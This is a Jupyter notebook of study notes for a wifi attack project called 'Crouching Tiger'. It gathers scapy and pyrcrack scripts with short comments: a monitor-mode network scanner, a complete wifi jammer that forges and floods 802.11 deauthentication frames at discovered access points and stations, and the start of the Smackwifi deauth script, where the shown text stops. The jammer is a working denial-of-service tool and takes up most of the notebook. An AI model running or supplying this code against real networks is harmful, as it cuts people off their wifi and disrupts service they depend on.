crouching_tiger/ctiger_study.ipynb
2023-10-24 16:42:27 -04:00

2093 lines
78 KiB
Text

{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Crouching Tiger Study Notebook\n",
"==============================\n",
"\n",
"This notebook contains snippets of code referenced in learning notes for Crouching Tiger.\n",
"\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Example #1 - The Shitty Scanner\n",
"\n",
"The shitty scanner is a wifi scanner written by and distributed by the hackersarise website. It is fairly dated, and believed to have been originally written for python2.7. It's referencing title is merely for entertainment purposes, as it is not poorly written in any way or shape. Although, it earned it's name due to the fact yours truly could never get it to run as it should."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"#!/usr/bin/python\n",
"# -*- coding: utf-8 -*-\n",
"# fetched from https://github.com/Tanmay-Patel-21/50_Team_Forbidden/.../wifi-scanner.py\n",
"\n",
"from scapy.all import *\n",
"import sys\n",
"import signal\n",
"import os\n",
"import ssl\n",
"\n",
"#Function to handle Crtl+C\n",
"def signal_handler(signal, frame):\n",
"\tprint('\\n=================')\n",
"\tprint('Execution aborted')\n",
"\tprint('=================')\n",
"\tos.system(\"kill -9 \" + str(os.getpid()))\n",
"\tsys.exit(1)\n",
"\n",
"def signal_exit(signal, frame):\n",
"\t# print\"Signal exit\";\n",
"\tsys.exit(1)\n",
"\n",
"def usage():\n",
"\tif len(sys.argv) < 3:\n",
"\t\tprint(\"\\nUsage:\")\n",
"\t\tprint(\"\\twifi-scanner.py -i <interface>\\n\")\n",
"\t\tsys.exit(1)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"The below `sniffpackets` function was originally used as the packet processing function of crouching tiger. Unfortunately, it never returned any output."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"\n",
"\n",
"def sniffpackets(packet):\n",
"\ttry:\n",
"\t\tSRCMAC = packet[0].addr2\n",
"\t\tDSTMAC = packet[0].addr1\n",
"\t\tBSSID = packet[0].addr3\n",
"\texcept:\n",
"\t\tprint(\"Cannot read MAC address\")\n",
"\t\tprint(str(packet).encode(\"hex\"))\n",
"\t\tsys.exc_clear()\n",
"\n",
"\ttry:\n",
"\t\tSSIDSize = packet[0][Dot11Elt].len\n",
"\t\tSSID = packet[0][Dot11Elt].info\n",
"\texcept:\n",
"\t\tSSID = \"\"\n",
"\t\tSSIDSize = 0\n",
"\n",
"\tif packet[0].type == 0:\n",
"\t\tST = packet[0][Dot11].subtype\n",
"\t\tif str(ST) == \"8\" and SSID != \"\" and DSTMAC.lower() == \"ff:ff:ff:ff:ff:ff\":\n",
"\t\t\tp = packet[Dot11Elt]\n",
"\t\t\tcap = packet.sprintf(\"{Dot11Beacon:%Dot11Beacon.cap%}\"\n",
"\t\t\t\t\t\t\"{Dot11ProbeResp:%Dot11ProbeResp.cap%}\").split('+')\n",
"\t\t\tchannel = None\n",
"\t\t\tcrypto = set()\n",
"\t\t\twhile isinstance(p, Dot11Elt):\n",
"\t\t\t\ttry:\n",
"\t\t\t\t\tif p.ID == 3:\n",
"\t\t\t\t\t\tchannel = ord(p.info)\n",
"\t\t\t\t\telif p.ID == 48:\n",
"\t\t\t\t\t\tcrypto.add(\"WPA2\")\n",
"\t\t\t\t\telif p.ID == 221 and p.info.startswith('\\x00P\\xf2\\x01\\x01\\x00'):\n",
"\t\t\t\t\t\tcrypto.add(\"WPA\")\n",
"\t\t\t\texcept:\n",
"\t\t\t\t\tpass\n",
"\t\t\t\tp = p.payload\n",
"\t\t\tif not crypto:\n",
"\t\t\t\tif 'privacy' in cap:\n",
"\t\t\t\t\tcrypto.add(\"WEP\")\n",
"\t\t\t\telse:\n",
"\t\t\t\t\tcrypto.add(\"OPN\")\n",
"\t\t\tif SRCMAC not in ssid_list.keys():\n",
"\t\t\t\tif '0050f204104a000110104400010210' in str(packet).encode(\"hex\"):\n",
"\t\t\t\t\tcrypto.add(\"WPS\")\n",
"\t\t\t\tprint(\"[+] New AP {0:5}\\t{1:20}\\t{2:20}\\t{3:5}\".format(channel, BSSID, ' / '.join(crypto), SSID))\n",
"\t\t\t\tssid_list[SRCMAC] = SSID\n",
"\n",
"def init_process ():\n",
"\tglobal ssid_list\n",
"\tssid_list = {}\n",
"\tglobal s\n",
"\ts = conf.L2socket(iface=newiface)\n",
"\n",
"def setup_monitor (iface):\n",
"\tprint(\"Setting up sniff options...\")\n",
"\tos.system('ifconfig ' + iface + ' down')\n",
"\ttry:\n",
"\t\tos.system('iwconfig ' + iface + ' mode monitor')\n",
"\texcept:\n",
"\t\tprint(\"Failed to setup monitor mode\")\n",
"\t\tsys.exit(1)\n",
"\tos.system('ifconfig ' + iface + ' up')\n",
"\treturn iface\n",
"\n",
"def check_root():\n",
"\tif not os.geteuid() == 0:\n",
"\t\tprint(\"Run as root.\")\n",
"\t\texit(1)\n",
"\n",
"if __name__ == \"__main__\":\n",
"\tsignal.signal(signal.SIGINT, signal_handler)\n",
"\tusage()\n",
"\tcheck_root()\n",
"\tparameters ={sys.argv[1]:sys.argv[2]}\n",
"\tif \"mon\" not in str(parameters[\"-i\"]):\n",
"\t\tnewiface = setup_monitor(parameters[\"-i\"])\n",
"\telse:\n",
"\t\tnewiface = str(parameters[\"-i\"])\n",
"\tinit_process()\n",
"\tprint(\"Sniffing on interface \" + str(newiface) + \"...\\n\")\n",
"\tsniff(iface=newiface, prn=sniffpackets, store=0)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Diagram #1 - Anatomy of wifi diagram\n",
"\n",
"It was from reading the page dedicated to the shitty scanner that gave rise to the below diagram, which was a poor man's attempt at diagraming the flow of different wifi packages."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"@startuml\n",
"boundary AP as ap\n",
"control Station as stat\n",
"entity Client as cli\n",
"queue Network as net\n",
"stat -> cli: Association request\n",
"cli --> stat: Association response\n",
"stat -> cli: Reassociation request\n",
"cli --> stat: Reassociation response\n",
"stat ->o net: Probe requst\n",
"cli o-->o net: Probe response\n",
"ap ->o net: Beacon\n",
"cli --> stat: Disassociation\n",
"cli -> ap: Authentication\n",
"cli --> ap: Deauthentication\n",
"stat -> ap: Action\n",
"stat ->o net: Power-save poll\n",
"cli -> stat: Request To Send\n",
"stat --> cli: Clear To Send\n",
"cli <-> stat: ACK: Acknowledge\n",
"stat <-> cli: Data frame\n",
"stat <--> cli: Null frame\n",
"net <-> ap: QOS data\n",
"ap <--> net: QOS null\n",
"@enduml"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Example #2 - pyrdump\n",
"\n",
"Pyrdump does not necessarily fall into the same group as the other scrips, as it uses the pyrcrack library and not scapy. The pyrcrack library is not nearly as robust as scapy, and includes the additional bloat of the aircrack-ng bundle. Furthermore, the example used the rich prompt library, which was an additional weight undesired. So, the use of pyrcrack was frowned upon."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"#!/usr/bin/env python3\n",
"#--- coding: utf-8 ---\n",
"# From: https://davidfrancos.net/pyrcrack/examples/ \n",
"\n",
"import asyncio\n",
"\n",
"import pyrcrack\n",
"\n",
"from rich.console import Console\n",
"from rich.prompt import Prompt\n",
"\n",
"async def scan_for_targets():\n",
" \"\"\"Scan for targets, return json.\"\"\"\n",
" console = Console()\n",
" console.clear()\n",
" console.show_cursor(False)\n",
" airmon = pyrcrack.AirmonNg()\n",
"\n",
" interface = Prompt.ask(\n",
" 'Select an interface',\n",
" choices=[a['interface'] for a in await airmon.interfaces])\n",
"\n",
" async with airmon(interface) as mon:\n",
" async with pyrcrack.AirodumpNg() as pdump:\n",
" async for result in pdump(mon.monitor_interface):\n",
" console.clear()\n",
" console.print(result.table)\n",
" await asyncio.sleep(2)\n",
"\n",
"\n",
"asyncio.run(scan_for_targets())"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Example #3 - Wifi Jammer\n",
"\n",
"Research for crouching tiger was not just focused on performing scans and deauthentication attacks, but it was the use of scapy to manipulate wifi packets to perform common wifi attacks. For some reason or another, this example was chosen at the time as an example of using scapy to jam wifi communications."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"#!/usr/bin/python\n",
"#Author: @hash3liZer\n",
"\n",
"import sys\n",
"import argparse\n",
"import threading\n",
"import os\n",
"import time\n",
"import signal\n",
"import random\n",
"import subprocess\n",
"import re\n",
"from pull import PULL\n",
"from scapy.sendrecv import sniff\n",
"from scapy.sendrecv import sendp\n",
"from scapy.sendrecv import send\n",
"from scapy.layers.dot11 import Dot11Beacon\n",
"from scapy.layers.dot11 import Dot11\n",
"from scapy.layers.dot11 import Dot11Elt\n",
"from scapy.layers.dot11 import RadioTap\n",
"from scapy.layers.dot11 import Dot11Deauth\n",
"from scapy.layers.dot11 import Dot11FCS\n",
"from scapy.layers.eap import EAPOL\n",
"\n",
"class JAMMER:\n",
"\n",
"\t__ACCESSPOINTS = []\n",
"\t__EXECUTED = []\n",
"\t__DECPACKETS = []\n",
"\n",
"\t__BROADCAST = \"ff:ff:ff:ff:ff:ff\"\n",
"\n",
"\tdef __init__(self, prs):\n",
"\t\tself.aggressive = prs.aggressive\n",
"\t\tself.verbose = prs.verbose\n",
"\t\tself.exceptions = prs.exceptions\n",
"\n",
"\t\tself.interface = prs.interface\n",
"\n",
"\t\tself.channel = prs.channel\n",
"\t\tself.essids = prs.essids\n",
"\t\tself.aps = prs.aps\n",
"\t\tself.stations = prs.stations\n",
"\t\tself.filters = prs.filters\n",
"\n",
"\t\tself.packets = prs.packets\n",
"\t\tself.delay = prs.delay\n",
"\t\tself.reset = prs.reset\n",
"\t\tself.code = prs.code\n",
"\n",
"\tdef extract_essid(self, layers):\n",
"\t\tretval = ''\n",
"\t\tcounter = 0\n",
"\n",
"\t\ttry:\n",
"\t\t\twhile True:\n",
"\t\t\t\tlayer = layers[counter]\n",
"\t\t\t\tif hasattr(layer, \"ID\") and layer.ID == 0:\n",
"\t\t\t\t\tretval = layer.info.decode('utf-8')\n",
"\t\t\t\t\tbreak\n",
"\t\t\t\telse:\n",
"\t\t\t\t\tcounter += 1\n",
"\t\texcept IndexError:\n",
"\t\t\tpass\n",
"\n",
"\t\treturn retval\n",
"\t\t\n",
"\tdef extract_channel(self, layers):\n",
"\t\tretval = ''\n",
"\t\tcounter = 0\n",
"\n",
"\t\ttry:\n",
"\t\t\twhile True:\n",
"\t\t\t\tlayer = layers[counter]\n",
"\t\t\t\tif hasattr(layer, \"ID\") and layer.ID == 3 and layer.len == 1:\n",
"\t\t\t\t\tretval = ord(layer.info)\n",
"\t\t\t\t\tbreak\n",
"\t\t\t\telse:\n",
"\t\t\t\t\tcounter += 1\n",
"\t\texcept IndexError:\n",
"\t\t\tpass\n",
"\n",
"\t\treturn retval\n",
"\n",
"\tdef get_ess(self, bss):\n",
"\t\tretval = ''\n",
"\n",
"\t\tfor ap in self.__ACCESSPOINTS:\n",
"\t\t\tif ap.get('bssid') == bss:\n",
"\t\t\t\tretval = ap.get('essid')\n",
"\t\t\t\tbreak\n",
"\n",
"\t\treturn retval\n",
"\n",
"\tdef get_channel(self, bss):\n",
"\t\tretval = 0\n",
"\n",
"\t\tfor ap in self.__ACCESSPOINTS:\n",
"\t\t\tif ap.get('bssid') == bss:\n",
"\t\t\t\tretval = ap.get('channel')\n",
"\n",
"\t\treturn retval\n",
"\n",
"\tdef filter_devices(self, sn, rc):\n",
"\t\tretval = {\n",
"\t\t\t'ap': '',\n",
"\t\t\t'sta': '',\n",
"\t\t}\n",
"\n",
"\t\tfor ap in self.__ACCESSPOINTS:\n",
"\t\t\tif ap.get('bssid') == sn:\n",
"\t\t\t\tretval['ap'] = sn\n",
"\t\t\t\tretval['sta'] = rc\n",
"\t\t\telif ap.get('bssid') == rc:\n",
"\t\t\t\tretval['ap'] = rc\n",
"\t\t\t\tretval['sta'] = sn\n",
"\n",
"\t\treturn retval\t\n",
"\n",
"\tdef aggressive_run(self, ap, sta):\n",
"\t\tpkt = self.forge(ap, sta)[0]\n",
"\n",
"\t\tself.write(ap, sta)\n",
"\n",
"\t\twhile True:\n",
"\t\t\tsendp(\n",
"\t\t\t\tpkt,\n",
"\t\t\t\tiface=self.interface,\n",
"\t\t\t\tcount=1,\n",
"\t\t\t\tinter=0,\n",
"\t\t\t\tverbose=False\n",
"\t\t\t)\t\n",
"\n",
"\tdef aggressive_handler(self, ap, sta):\t\t\n",
"\t\tif (sta not in self.exceptions) and (self.aggressive) and (len(self.channel) == 1):\n",
"\t\t\tt = threading.Thread(target=self.aggressive_run, args=(ap, sta))\n",
"\t\t\tt.daemon = True\n",
"\t\t\tt.start()\n",
"\n",
"\n",
"\tdef clarify(self, toappend):\n",
"\t\tessid = toappend.get('essid')\n",
"\t\tbssid = toappend.get('bssid')\n",
"\n",
"\t\tif self.essids:\n",
"\t\t\tif essid in self.essids:\n",
"\t\t\t\tif self.aps:\n",
"\t\t\t\t\tif bssid in self.aps:\n",
"\t\t\t\t\t\tself.__ACCESSPOINTS.append( toappend )\n",
"\t\t\t\t\t\tself.aggressive_handler(bssid, self.__BROADCAST)\n",
"\t\t\t\telse:\n",
"\t\t\t\t\tself.__ACCESSPOINTS.append( toappend )\n",
"\t\t\t\t\tself.aggressive_handler(bssid, self.__BROADCAST)\n",
"\t\telse:\n",
"\t\t\tif self.aps:\n",
"\t\t\t\tif bssid in self.aps:\n",
"\t\t\t\t\tself.__ACCESSPOINTS.append( toappend )\n",
"\t\t\t\t\tself.aggressive_handler(bssid, self.__BROADCAST)\n",
"\t\t\telse:\n",
"\t\t\t\tself.__ACCESSPOINTS.append( toappend )\n",
"\t\t\t\tself.aggressive_handler(bssid, self.__BROADCAST)\n",
"\n",
"\tdef invalid(self, sta):\n",
"\t\tfor exception in self.exceptions:\n",
"\t\t\tif sta.startswith(exception):\n",
"\t\t\t\treturn True\n",
"\n",
"\t\treturn False\n",
"\n",
"\tdef is_valid_sta(self, sta):\n",
"\t\tif self.stations:\n",
"\t\t\tif sta in self.stations:\n",
"\t\t\t\treturn True\n",
"\t\t\telse:\n",
"\t\t\t\treturn False\n",
"\t\telse:\n",
"\t\t\treturn True\n",
"\n",
"\tdef get_crate(self, ch):\n",
"\t\tretval = []\n",
"\n",
"\t\tfor connection in self.__DECPACKETS:\n",
"\t\t\tchannel = connection.get('channel')\n",
"\n",
"\t\t\tif channel == ch:\n",
"\t\t\t\tretval.append(connection)\n",
"\n",
"\t\treturn retval\n",
"\n",
"\tdef forge(self, ap, sta):\n",
"\t\tdef fpkt(sn, rc):\n",
"\t\t\tpkt = RadioTap() / Dot11(\n",
"\t\t\t\ttype=0, \n",
"\t\t\t\tsubtype=12,\n",
"\t\t\t\taddr1=rc, \n",
"\t\t\t\taddr2=sn, \n",
"\t\t\t\taddr3=sn\n",
"\t\t\t\t) / Dot11Deauth(\n",
"\t\t\t\treason=self.code\n",
"\t\t\t\t)\n",
"\t\t\treturn pkt\n",
"\n",
"\t\tretval = []\n",
"\n",
"\t\tif sta != self.__BROADCAST:\n",
"\t\t\tretval.append(fpkt(ap, sta))\n",
"\t\t\tretval.append(fpkt(sta, ap))\n",
"\t\telse:\n",
"\t\t\tretval.append(fpkt(ap, sta))\n",
"\n",
"\t\treturn retval\n",
"\n",
"\tdef filtertify(self, ap, sta):\n",
"\t\tif self.invalid(sta):\n",
"\t\t\treturn\n",
"\t\telse:\n",
"\t\t\tif ap not in self.filters and sta not in self.filters:\n",
"\t\t\t\tif self.is_valid_sta(sta):\n",
"\t\t\t\t\tonrun_form = (ap, sta)\n",
"\t\t\t\t\tif onrun_form not in self.__EXECUTED:\n",
"\n",
"\t\t\t\t\t\tself.__EXECUTED.append(onrun_form)\n",
"\t\t\t\t\t\tpkt_form = {\n",
"\t\t\t\t\t\t\t'ap': ap,\n",
"\t\t\t\t\t\t\t'sta': sta,\n",
"\t\t\t\t\t\t\t'channel': self.get_channel(ap),\n",
"\t\t\t\t\t\t}\n",
"\n",
"\t\t\t\t\t\tself.__DECPACKETS.append(pkt_form)\n",
"\n",
"\tdef injector(self, pkt):\n",
"\t\tif pkt.haslayer(Dot11Beacon):\n",
"\t\t\ttry:\n",
"\t\t\t\tbssid = pkt.getlayer(Dot11FCS).addr2\n",
"\t\t\texcept:\n",
"\t\t\t\tbssid = pkt.getlayer(Dot11).addr2\n",
"\n",
"\t\t\tessid = self.extract_essid(pkt.getlayer(Dot11Elt))\n",
"\t\t\tchannel = self.extract_channel(pkt.getlayer(Dot11Elt))\n",
"\n",
"\t\t\ttoappend = {\n",
"\t\t\t\t'essid': essid,\n",
"\t\t\t\t'bssid': bssid,\n",
"\t\t\t\t'channel': channel\n",
"\t\t\t}\n",
"\n",
"\t\t\tif toappend not in self.__ACCESSPOINTS:\n",
"\t\t\t\tself.clarify(\n",
"\t\t\t\t\ttoappend\n",
"\t\t\t\t)\n",
"\n",
"\t\telse:\n",
"\t\t\tsender = receiver = \"\"\n",
"\t\t\tif pkt.haslayer(Dot11FCS) and pkt.getlayer(Dot11FCS).type == 2 and not pkt.haslayer(EAPOL):\n",
"\t\t\t\tsender = pkt.getlayer(Dot11FCS).addr2\n",
"\t\t\t\treceiver = pkt.getlayer(Dot11FCS).addr1\n",
"\n",
"\t\t\telif pkt.haslayer(Dot11) and pkt.getlayer(Dot11).type == 2 and not pkt.haslayer(EAPOL):\n",
"\t\t\t\tsender = pkt.getlayer(Dot11).addr2\n",
"\t\t\t\treceiver = pkt.getlayer(Dot11).addr1\n",
"\n",
"\t\t\tif sender and receiver:\n",
"\t\t\t\tresult = self.filter_devices(sender, receiver)\n",
"\n",
"\t\t\t\tif result.get('ap') and result.get('sta'):\n",
"\t\t\t\t\tself.filtertify(result.get('ap'), result.get('sta'))\n",
"\n",
"\tdef write(self, ap, sta):\n",
"\t\tif self.verbose:\n",
"\t\t\tpull.print(\"*\",\n",
"\t\t\t\t\"Sent Deauths Count [{count}] Code [{code}] ({sdeveloper}) {sender} <--> ({rdeveloper}) {receiver} ({essid}) [{channel}]\".format(\n",
"\t\t\t\t\tcount=pull.RED+str(self.packets)+pull.END,\n",
"\t\t\t\t\tcode =pull.GREEN+str(self.code)+pull.END,\n",
"\t\t\t\t\tsender=pull.DARKCYAN+ap.upper()+pull.END,\n",
"\t\t\t\t\treceiver=pull.DARKCYAN+sta.upper()+pull.END,\n",
"\t\t\t\t\tsdeveloper=pull.PURPLE+pull.get_mac(ap)+pull.END,\n",
"\t\t\t\t\trdeveloper=pull.PURPLE+pull.get_mac(sta)+pull.END,\n",
"\t\t\t\t\tessid=pull.YELLOW+self.get_ess(ap)+pull.END,\n",
"\t\t\t\t\tchannel=pull.RED+str(self.get_channel(ap))+pull.END\n",
"\t\t\t\t),\n",
"\t\t\t\tpull.YELLOW\n",
"\t\t\t)\n",
"\t\telse:\n",
"\t\t\tpull.print(\"*\",\n",
"\t\t\t\t\"Sent Deauths Count [{count}] Code [{code}] {sender} <--> {receiver} ({essid}) [{channel}]\".format(\n",
"\t\t\t\t\tcount=pull.RED+str(self.packets)+pull.END,\n",
"\t\t\t\t\tcode =pull.GREEN+str(self.code)+pull.END,\n",
"\t\t\t\t\tsender=pull.DARKCYAN+ap.upper()+pull.END,\n",
"\t\t\t\t\treceiver=pull.DARKCYAN+sta.upper()+pull.END,\n",
"\t\t\t\t\tessid=pull.YELLOW+self.get_ess(ap)+pull.END,\n",
"\t\t\t\t\tchannel=pull.RED+str(self.get_channel(ap))+pull.END\n",
"\t\t\t\t),\n",
"\t\t\t\tpull.YELLOW\n",
"\t\t\t)\n",
"\n",
"\tdef jammer(self):\n",
"\t\twhile True:\n",
"\t\t\tch = random.choice(self.channel)\n",
"\t\t\tsubprocess.call(['iwconfig', self.interface, 'channel', str(ch)])\n",
"\t\t\ttime.sleep(0.5)\n",
"\n",
"\t\t\tcrate = self.get_crate(ch)\n",
"\n",
"\t\t\tfor connection in crate:\n",
"\t\t\t\tap = connection.get( 'ap' )\n",
"\t\t\t\tsta = connection.get( 'sta' )\n",
"\t\t\t\tchannel = connection.get( 'channel' )\n",
"\n",
"\t\t\t\tpkts = self.forge(ap, sta)\n",
"\t\t\t\tfor pkt in pkts:\n",
"\t\t\t\t\tsendp(pkt, iface=self.interface, count=self.packets, inter=self.delay, verbose=False)\n",
"\n",
"\t\t\t\tself.write(ap, sta)\n",
"\n",
"\t\t\tself.resetter()\n",
"\n",
"\t\t\ttime.sleep(0.5)\n",
"\n",
"\tdef resetter(self):\n",
"\t\tif self.reset:\n",
"\t\t\tif len(self.__EXECUTED) >= self.reset:\n",
"\t\t\t\tself.__EXECUTED = []\n",
"\t\t\t\tself.__DECPACKETS = []\n",
"\n",
"\tdef engage(self):\n",
"\t\tt = threading.Thread(target=self.jammer)\n",
"\t\tt.daemon = True\n",
"\t\tt.start()\n",
"\n",
"\t\tsniff(iface=self.interface, prn=self.injector)\n",
"\n",
"class PARSER:\n",
"\n",
"\tdef __init__(self, opts):\n",
"\t\tself.help = self.help(opts.help)\n",
"\t\tself.world = opts.world\n",
"\t\tself.aggressive = opts.aggressive\n",
"\t\tself.exceptions = self.exceptions(opts.nbroadcast)\n",
"\t\tself.verbose = opts.verbose\n",
"\t\tself.interface = self.interface(opts.interface)\n",
"\n",
"\t\tself.channel = self.channel(opts.channel)\n",
"\t\tself.essids = self.form_essids(opts.aps)\n",
"\t\tself.aps = self.form_macs(opts.aps)\n",
"\t\tself.stations = self.form_macs(opts.stations)\n",
"\t\tself.filters = self.form_macs(opts.filters)\n",
"\n",
"\t\tself.packets = opts.packets if opts.packets > 0 else pull.halt(\"Number of packets Must Be >= 1\", True, pull.RED)\n",
"\t\tself.delay = opts.delay if opts.delay >= 0 else pull.halt(\"Delay Interval Must be >= 0\", True, pull.RED)\n",
"\t\tself.reset = opts.reset if ((opts.reset == 0) or (opts.reset >= 5)) else pull.halt(\"Reset Must Be >= 5. \")\n",
"\t\tself.code = opts.code if ((opts.code >= 1) and (opts.code <= 66)) else pull.halt(\"Code Must Be Greater Greater >= 1 and <= 66\")\n",
"\n",
"\tdef help(self, _help):\n",
"\t\tif _help:\n",
"\t\t\tpull.help()\n",
"\n",
"\tdef exceptions(self, nbroadcast):\n",
"\t\tretval = []\n",
"\t\tif not nbroadcast:\n",
"\t\t\tretval = ['00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:']\n",
"\t\telse:\n",
"\t\t\tretval = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:']\n",
"\t\treturn retval\n",
"\n",
"\tdef form_essids(self, essids):\n",
"\t\tretval = []\n",
"\t\tif essids:\n",
"\t\t\ttoloop = essids.split(\",\")\n",
"\t\t\tfor essid in toloop:\n",
"\t\t\t\tif not re.search(r\"^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$\", essid):\n",
"\t\t\t\t\tretval.append(essid)\n",
"\n",
"\t\treturn retval\n",
"\n",
"\tdef form_macs(self, bssids):\n",
"\t\tretval = []\n",
"\t\tif bssids:\n",
"\t\t\ttoloop = bssids.split(\",\")\n",
"\t\t\tfor bssid in toloop:\n",
"\t\t\t\tif re.search(r\"^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$\", bssid):\n",
"\t\t\t\t\tretval.append(bssid.lower())\n",
"\n",
"\t\treturn retval\n",
"\n",
"\tdef channel(self, ch):\n",
"\t\tretval = list(range(1,15)) if self.world else list(range(1,12))\n",
"\t\tif ch:\n",
"\t\t\tif ch in retval:\n",
"\t\t\t\treturn [ch]\n",
"\t\t\telse:\n",
"\t\t\t\tpull.halt(\"Invalid Channel Given.\", True, pull.RED)\n",
"\t\telse:\n",
"\t\t\treturn retval\n",
"\n",
"\tdef interface(self, iface):\n",
"\t\tdef getNICnames():\n",
"\t\t\tifaces = []\n",
"\t\t\tdev = open('/proc/net/dev', 'r')\n",
"\t\t\tdata = dev.read()\n",
"\t\t\tfor n in re.findall('[a-zA-Z0-9]+:', data):\n",
"\t\t\t\tifaces.append(n.rstrip(\":\"))\n",
"\t\t\treturn ifaces\n",
"\n",
"\t\tdef confirmMon(iface):\n",
"\t\t\tco = subprocess.Popen(['iwconfig', iface], stdout=subprocess.PIPE)\n",
"\t\t\tdata = co.communicate()[0].decode()\n",
"\t\t\tcard = re.findall('Mode:[A-Za-z]+', data)[0]\t\n",
"\t\t\tif \"Monitor\" in card:\n",
"\t\t\t\treturn True\n",
"\t\t\telse:\n",
"\t\t\t\treturn False\n",
"\n",
"\t\tif iface:\n",
"\t\t\tifaces = getNICnames()\n",
"\t\t\tif iface in ifaces:\n",
"\t\t\t\tif confirmMon(iface):\n",
"\t\t\t\t\treturn iface\n",
"\t\t\t\telse:\n",
"\t\t\t\t\tpull.halt(\"Interface Not In Monitor Mode [%s]\" % (pull.RED + iface + pull.END), True, pull.RED)\n",
"\t\t\telse:\n",
"\t\t\t\tpull.halt(\"Interface Not Found. [%s]\" % (pull.RED + iface + pull.END), True, pull.RED)\n",
"\t\telse:\n",
"\t\t\tpull.halt(\"Interface Not Provided. Specify an Interface!\", True, pull.RED)\n",
"\n",
"def main():\n",
"\tparser = argparse.ArgumentParser(add_help=False)\n",
"\n",
"\tparser.add_argument('-h', '--help' , dest=\"help\" , default=False, action=\"store_true\")\n",
"\tparser.add_argument('-i', '--interface' , dest=\"interface\", default=\"\", type=str)\n",
"\n",
"\tparser.add_argument('-c', '--channel' , dest=\"channel\" , default=0 , type=int)\n",
"\tparser.add_argument('-a', '--accesspoints', dest=\"aps\" , default=\"\", type=str)\n",
"\tparser.add_argument('-s', '--stations' , dest=\"stations\", default=\"\", type=str)\n",
"\tparser.add_argument('-f', '--filters' , dest=\"filters\" , default=\"\", type=str)\n",
"\n",
"\tparser.add_argument('-p', '--packets' , dest=\"packets\" , default=5 , type=int)\n",
"\tparser.add_argument('-d', '--delay' , dest=\"delay\" , default=0.1, type=int)\n",
"\tparser.add_argument('-r', '--reset' , dest=\"reset\" , default=0 , type=int)\n",
"\tparser.add_argument('--code' , dest=\"code\" , default=7 , type=int)\n",
"\n",
"\tparser.add_argument('--world' , dest=\"world\" , default=False, action=\"store_true\")\n",
"\tparser.add_argument('--aggressive' , dest=\"aggressive\", default=False, action=\"store_true\")\n",
"\tparser.add_argument('--no-broadcast' , dest=\"nbroadcast\", default=False, action=\"store_true\")\n",
"\tparser.add_argument('--verbose' , dest=\"verbose\" , default=False, action=\"store_true\")\n",
"\n",
"\toptions = parser.parse_args()\n",
"\tparser = PARSER(options)\n",
"\n",
"\tpull.print(\n",
"\t\t\"*\",\n",
"\t\t\"IFACE [{interface}] CHANNEL [{channel}] VERBOSE [{verbose}]\".format(\n",
"\t\t\tinterface=pull.DARKCYAN+parser.interface+pull.END,\n",
"\t\t\tchannel=pull.DARKCYAN+str((\"HOP\" if len(parser.channel) > 1 else parser.channel[0]))+pull.END,\n",
"\t\t\tverbose=pull.DARKCYAN+(\"True\" if parser.verbose else \"False\")+pull.END\n",
"\t\t),\n",
"\t\tpull.DARKCYAN,\n",
"\t)\n",
"\n",
"\tpull.print(\n",
"\t\t\"*\",\n",
"\t\t\"APS [{aps}] STATIONS [{stations}] FILTERS [{filters}]\".format(\n",
"\t\t\taps=pull.DARKCYAN+str(len(parser.aps))+pull.END,\n",
"\t\t\tstations=pull.DARKCYAN+str(len(parser.stations))+pull.END,\n",
"\t\t\tfilters=pull.DARKCYAN+str(len(parser.filters))+pull.END\n",
"\t\t),\n",
"\t\tpull.DARKCYAN\n",
"\t)\n",
"\n",
"\tpull.print(\n",
"\t\t\"*\",\n",
"\t\t\"PACKETS [{packets}] DELAY [{delay}] RST [{reset}] CD [{code}]\".format(\n",
"\t\t\tpackets=pull.DARKCYAN+str(parser.packets)+pull.END,\n",
"\t\t\tdelay=pull.DARKCYAN+str(parser.delay)+pull.END,\n",
"\t\t\treset=pull.DARKCYAN+str(parser.reset)+pull.END,\n",
"\t\t\tcode=pull.DARKCYAN+str(parser.code)+pull.END\n",
"\t\t),\n",
"\t\tpull.DARKCYAN\n",
"\t)\n",
"\n",
"\tpull.print(\n",
"\t\t\"^\",\n",
"\t\t\"Engaing With Jammer Now\",\n",
"\t\tpull.GREEN\n",
"\t)\n",
"\n",
"\tjammer = JAMMER(parser)\n",
"\tjammer.engage()\n",
"\n",
"if __name__ == \"__main__\":\n",
"\tpull = PULL()\n",
"\tmain()"
]
},
{
"cell_type": "markdown",
"metadata": {
"notebookRunGroups": {
"groupValue": ""
}
},
"source": [
"## Example #4 - Smackwifi\n",
"\n",
"From https://github.com/n0nexist/Smackwifi\n",
"\n",
"One of the numerous examples of using scapy to deauthenticate network clients.\n",
"\n",
"Except for the use of decorators, this script was found to be rather easy to read and straightforward. As such, it was used as the primary example to base the attack vector of crouching tiger on."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"#!/usr/bin/python3\n",
"# smackwifi by github.com/n0nexist\n",
"from rich import print\n",
"from rich.console import Console\n",
"from rich.table import Table\n",
"from rich.prompt import Prompt\n",
"from rich import box\n",
"import os\n",
"import psutil\n",
"from scapy.all import *\n",
"import time\n",
"from threading import Thread\n",
"\n",
"if os.getuid() != 0:\n",
" print(\"You are [red]not[/red] root.\")\n",
" exit(1)\n",
"\n",
"os.system(\"clear\")\n",
"print(\"Welcome to [green][bold]smackwifi[/bold][/green]!\")\n",
"\n",
"addrs = list(psutil.net_if_addrs())\n",
